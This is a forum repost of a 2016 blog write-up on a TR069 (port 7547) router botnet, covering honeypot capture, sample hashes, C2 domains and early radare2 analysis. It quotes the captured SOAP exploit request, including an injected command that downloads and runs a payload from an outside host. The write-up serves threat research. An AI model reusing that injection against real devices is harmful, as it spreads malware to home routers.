技术控

    今日:183| 主题:51411
收藏本版 (1)
最新软件应用技术尽在掌握

[其他] Quick TR069 Botnet Writeup + Triage

[复制链接]
复制你的爱 发表于 2016-11-30 20:25:21
203 1

立即注册CoLaBug.com会员,免费获得投稿人的专业资料,享用更多功能,玩转个人品牌!

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
TL;DR- A wormable exploit for the recently published TR069 is being actively exploited. I pulled down some samples and hacked together a goofy way to perform dynamic analysis with Docker, Qemu, and Tcpdump. The C2 domains are tr069[.]support and tr069[.]online .
  There are several different botnets propogating this worm. I'm only going to document one of them in this post. Also I haven't written a blog post in like a year so here goes nothing.
  Background

  A few articles have crossed my news feeds about the recent TR069 vulnerability. Including the following-
  
       
  • http://arstechnica.com/security/2016/11/notorious-iot-botnets-weaponize-new-flaw-found-in-millions-of-home-routers/   
  • https://blog.fox-it.com/2016/11/28/recent-vulnerability-in-eir-d1000-router-used-to-spread-updated-version-of-mirai-ddos-bot/   
  • https://isc.sans.edu/diary/Port+7547+SOAP+Remote+Code+Execution+Attack+Against+DSL+Modems/21759  
  I figured I'd whip up a web server on a machine I had laying around (something like a raspberry pi) and forward TCP port 7547 through my router, as well as a sniffer for any funky stuff.
  Analysis

  Within about five minutes I was getting hits. The malicious requests have already been documented by some of the aforementioned posts, but the requests look something like this:
  [code]POST /UD/act?1 HTTP/1.1  
Host: 127.0.0.1:7547  
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers  
Content-Type: text/xml  
Content-Length: 519

  
SOAP ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">  
  
  
`cd /tmp;wget http://srrys.pw/1;chmod 777 1;./1`  
  
  
  
  
  
  
[/code]  Notice the not-so-subtle command injection in this line-
  [code]`cd /tmp;wget http://srrys.pw/1;chmod 777 1;./1`[/code]   So I routed curl through Tor and downloaded the sample. Also, having reversed a decent amount of shitty IOT worms in my day I went on a hunch and requested hxxp://srrys[.]pw/2 through hxxp://srrys[.]pw/10 as well and got more hits.
  [code]$ file *
1:            ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped  
2:            ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped  
3:            ELF 32-bit LSB executable, ARM, version 1, statically linked, stripped  
4:            ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, stripped  
5:            ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, stripped  
6:            ELF 32-bit MSB executable, SPARC, version 1 (SYSV), statically linked, stripped  
7:            ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, stripped[/code]  ...with the following SHA256 hashes...
  [code]971156ec3dca4fa5c53723863966ed165d546a184f3c8ded008b029fd59d6a5a  1  
9f9c38740568cbe1fbb8171b1ad4221c43790ff106623555868abf76f9672e53  2  
1fce697993690d41f75e0e6ed522df49d73a038f7e02733ec239c835579c40bf  3  
828984d1112f52f7f24bbc2b15d0f4cf2646cd03809e648f0d3121a1bdb83464  4  
c597d3b8f61a5b49049006aff5abfe30af06d8979aaaf65454ad2691ef03943b  5  
046659391b36a022a48e37bd80ce2c3bd120e3fe786c204128ba32aa8d03a182  6  
5d4e46b3510679dc49ce295b7f448cd69e952d80ba1450f6800be074992b07cc  7[/code]   If you've ever tracked IOT threats before this will be a familiar sight. Lots of malware cross compiles for lots of different architectures, like in this example .
   Lets do some basic static analysis. This is usually where I'd bust out my IDA Pro but some fucker stole my laptop recently and I haven't gotten my new license yet. So instead we're going to use Radare2, something equally cool but less familiar to me. Shouts out to the R2 team. Keep doing God's work.
  [code]$ r2 1
Warning: Cannot initialize dynamic strings  
-- Change the graph block definition with graph.callblocks, graph.jmpblocks, graph.flagblocks
[0x00400260]> aa
[x] Analyze all flags starting with sym. and entry0 (aa)[/code]   I run the aa command to analyze the code/functions, followed by pdf @main to disassemble main in the regular mode and V @main + space bar to disassemble in visual mode.
  ah yes
   
Quick TR069 Botnet Writeup + Triage-1 (different,following,published,recently,document)

  of course

Quick TR069 Botnet Writeup + Triage-2 (different,following,published,recently,document)

  indeed
123下一页
友荐云推荐




上一篇:Do you even need that bind?
下一篇:Integrating Logz.io with PagerDuty & Using Aggregations for Alerts
酷辣虫提示酷辣虫禁止发表任何与中华人民共和国法律有抵触的内容!所有内容由用户发布,并不代表酷辣虫的观点,酷辣虫无法对用户发布内容真实性提供任何的保证,请自行验证并承担风险与后果。如您有版权、违规等问题,请通过"联系我们"或"违规举报"告知我们处理。

郭为 发表于 2016-12-17 17:10:30
复制你的爱的等级很高啊!
回复 支持 反对

使用道具 举报

*滑动验证:
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

我要投稿

推荐阅读

扫码访问 @iTTTTT瑞翔 的微博
回页顶回复上一篇下一篇回列表手机版
手机版/CoLaBug.com ( 粤ICP备05003221号 | 文网文[2010]257号 )|网站地图 酷辣虫

© 2001-2017 Comsenz Inc. Design: Dean. DiscuzFans.

返回顶部 返回列表